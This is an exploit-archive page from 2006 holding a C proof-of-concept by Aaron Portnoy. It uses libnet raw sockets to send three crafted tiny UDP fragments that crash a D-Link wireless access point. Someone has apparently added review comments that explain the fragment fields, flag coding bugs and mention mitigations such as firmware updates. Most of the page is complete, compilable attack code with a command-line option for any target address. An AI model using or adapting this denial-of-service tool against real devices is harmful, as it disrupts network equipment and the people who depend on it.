D-Link Wireless Access Point UDP Packets Remote Denial of Service Exploit
来源:silc.thunkers.net 作者:Aaron 发布时间:2006-02-15  

D-Link Wireless Access Point UDP Packets Remote Denial of Service Exploit


/*
*
* Aaron Portnoy
*
* silc.thunkers.net, thunkers
*
* D-Link Wireless Access Point
* Fragmented UDP DoS Proof of Concept
*
*
* gcc -o dlink_dos dlink_dos.c -lnet -Wall
*
*/

#include <libnet.h>

/*
 * Built-in defaults. gen_packet() falls back to these when the matching
 * command-line value is absent (NULL string or a port of 0).
 * Both addresses default to loopback, so a run without -d targets the
 * local host only.
 */
#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111

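/*
 * usage - print the command-line synopsis to stderr and terminate.
 *
 * name: program name shown in the synopsis (main() passes argv[0]).
 *
 * Does not return: it always calls exit(EXIT_FAILURE), including when
 * it is reached through -h.
 */
void usage (char *name)
{
    /*
     * Adjacent string literals replace the original backslash-newline
     * inside the literal, which joined "<destination ip>" and "-a" with
     * whatever whitespace happened to start the next source line.
     * -D and -h are accepted by main()'s getopt string and are listed too.
     */
    fprintf (stderr,
             "Usage: %s [-D <device>] -s <source ip> -d <destination ip> "
             "-a <source port> -b <destination port> [-h]\n",
             name);

    exit (EXIT_FAILURE);
}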

/*
 * gen_packet - build and send one IPv4/UDP packet of the three-packet PoC.
 *
 * device:     interface name handed to libnet_init(); NULL selects DEVICE.
 * pSRC, pDST: source / destination host strings; NULL selects SRC_IP / DST_IP.
 * sPRT, dPRT: UDP ports; 0 selects SRC_PRT / DST_PRT.
 * count:      position in the sequence (main() passes 1, 2, 3); it selects
 *             the payload and the IPv4 flags/fragment-offset word.
 *
 * Returns EXIT_SUCCESS after a successful write. Every failure path calls
 * exit(EXIT_FAILURE), so callers never observe an error return.
 *
 * Reviewer notes (defensive reading):
 *  - All three packets use IP ID 1800, TTL 128 and protocol UDP, with
 *    fragment offsets 0, 2 and 3 (8-byte units). On the wire this is a
 *    short run of very small UDP fragments belonging to one datagram.
 *  - Mitigation for this class of bug is normally a vendor firmware update,
 *    plus reassembling or dropping tiny fragments upstream of the device.
 *    The page names no affected model, firmware version or advisory.
 */
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
u_short dPRT, int count)
{

libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;

char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;

if (!device)
device = DEVICE;

/* LIBNET_RAW4 requests a raw-socket IPv4 injection context; raw sockets
   normally need root or CAP_NET_RAW. */
l = libnet_init (LIBNET_RAW4, device, errbuf);

if (!l) {
fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}

/* NOTE(review): neither lookup result is checked. libnet_name2addr4()
   presumably reports failure as -1 -- confirm against the libnet version
   in use -- and that value would then be used as the address. */
src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);

dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);

src_prt = sPRT ? sPRT : SRC_PRT;

dst_prt = dPRT ? dPRT : DST_PRT;

/* Only the first packet carries data: eight zero bytes. For counts 2 and 3
   payload stays NULL and payload_s stays 0. */
if (count == 1) {
payload = "\0\0\0\0\0\0\0\0";
payload_s = 8;
}

/* The UDP length argument is twice the header-plus-payload size built in
   this packet. Assuming LIBNET_UDP_H is 8 that is 32 for count 1 and 16
   for counts 2 and 3 -- presumably covering data carried by the later
   fragments; TODO confirm. The checksum argument is 0 (presumably left for
   libnet to fill in -- confirm). */
udp = libnet_build_udp (src_prt,
dst_prt,
(LIBNET_UDP_H + payload_s) * 2,
0, (unsigned char *)payload, payload_s, l, udp);

if (udp == -1) {
fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}

/* IPv4 flags/offset word: the top 3 bits are flags, the low 13 bits are
   the fragment offset in 8-byte units.
     count 1: IP_MF   -> more-fragments set, offset 0
     count 2: 0x2002  -> more-fragments set, offset 2 (byte 16)
     count 3: 0x0003  -> no flags, offset 3 (byte 24), i.e. last fragment
   NOTE(review): there is no default case, so frag is read uninitialized
   (undefined behavior) if count is outside 1..3. main() only passes 1..3. */
switch (count) {

case 1:
frag = IP_MF;
break;

case 2:
frag = 0x2002;
break;

case 3:
frag = 0x0003;
break;
}

/* Arguments in order: total length 20 (header size only, although a UDP
   header was queued above), TOS 0, ID 1800, flags/offset, TTL 128,
   protocol UDP, checksum 0, addresses, no extra payload.
   NOTE(review): the OS may rewrite some header fields on raw sockets, so
   the bytes on the wire can differ from these arguments -- verify with a
   capture. */
ip = libnet_build_ipv4 (20,
0,
1800,
frag,
128,
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);

if (ip == -1) {
fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}

/* Send the packet assembled in the libnet context. */
c = libnet_write (l);

if (c == -1) {
fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}

printf ("Wrote UDP packet; check the wire.\n");

/* Only the success path releases the context; the error paths above exit
   the process without calling libnet_destroy(). */
libnet_destroy (l);

return (EXIT_SUCCESS);

}

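/*
 * parse_port - convert a command-line port argument to a u_short.
 *
 * text: option argument to parse (decimal).
 * out:  receives the port on success; left untouched on failure.
 *
 * Returns 0 on success, -1 if text is empty, has trailing characters, or is
 * outside 0..65535. Zero is accepted because gen_packet() treats a zero
 * port as "use the built-in default".
 */
static int parse_port (const char *text, u_short *out)
{
    char *end = NULL;
    long value;

    if (text == NULL || *text == '\0')
        return -1;

    /* strtol() saturates on overflow, so the range test below also rejects
       values too large for long. */
    value = strtol (text, &end, 10);
    if (*end != '\0' || value < 0 || value > 65535)
        return -1;

    *out = (u_short) value;
    return 0;
}

/*
 * main - parse options, print the effective settings, then call
 * gen_packet() once for each of the three sequence numbers 1..3.
 *
 * Options: -D device, -s source host, -d destination host,
 *          -a source port, -b destination port, -h usage.
 * Anything not supplied falls back to DEVICE, SRC_IP, DST_IP, SRC_PRT and
 * DST_PRT; both default addresses are loopback.
 *
 * Returns EXIT_SUCCESS. usage() and the error paths inside gen_packet()
 * terminate the process instead of returning.
 */
int main (int argc, char **argv)
{
    int opt;
    int seq;
    char *pDST = NULL;
    char *pSRC = NULL;
    char *device = NULL;
    u_short dPRT = 0;
    u_short sPRT = 0;

    /* getopt() signals the end of the options with -1. */
    while ((opt = getopt (argc, argv, "D:d:s:a:b:h")) != -1) {
        switch (opt) {
        case 'D':
            device = optarg;
            break;
        case 'd':
            pDST = optarg;
            break;
        case 's':
            pSRC = optarg;
            break;
        case 'a':
            /* The original used atoi(), which silently truncated
               out-of-range or non-numeric input into a u_short. */
            if (parse_port (optarg, &sPRT) != 0) {
                fprintf (stderr, "Invalid source port: %s\n", optarg);
                usage (argv[0]);
            }
            break;
        case 'b':
            if (parse_port (optarg, &dPRT) != 0) {
                fprintf (stderr, "Invalid destination port: %s\n", optarg);
                usage (argv[0]);
            }
            break;
        case 'h':
        default:
            /* Unknown options and missing arguments now show the synopsis
               instead of being ignored. */
            usage (argv[0]);
            break;
        }
    }

    printf ("\n----------------------------------\n");
    printf (" -= D-Link DoS PoC =-\n");
    printf (" Aaron Portnoy\n");
    printf (" deft () thunkers ! net \n");
    printf (" silc.thunkers.net, thunkers\n");
    printf ("----------------------------------\n");

    /* Echo the values gen_packet() will actually use, defaults included. */
    printf ("\nDevice: \t%s\n", device ? device : DEVICE);
    printf ("SRC IP: \t%s\n", pSRC ? pSRC : SRC_IP);
    printf ("DST IP: \t%s\n", pDST ? pDST : DST_IP);
    printf ("SPort: \t\t%d\n", sPRT ? sPRT : SRC_PRT);
    printf ("DPort: \t\t%d\n\n", dPRT ? dPRT : DST_PRT);

    for (seq = 1; seq <= 3; seq++)
        gen_packet (device, pSRC, pDST, sPRT, dPRT, seq);
    printf ("\n");

    return (EXIT_SUCCESS);
}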




 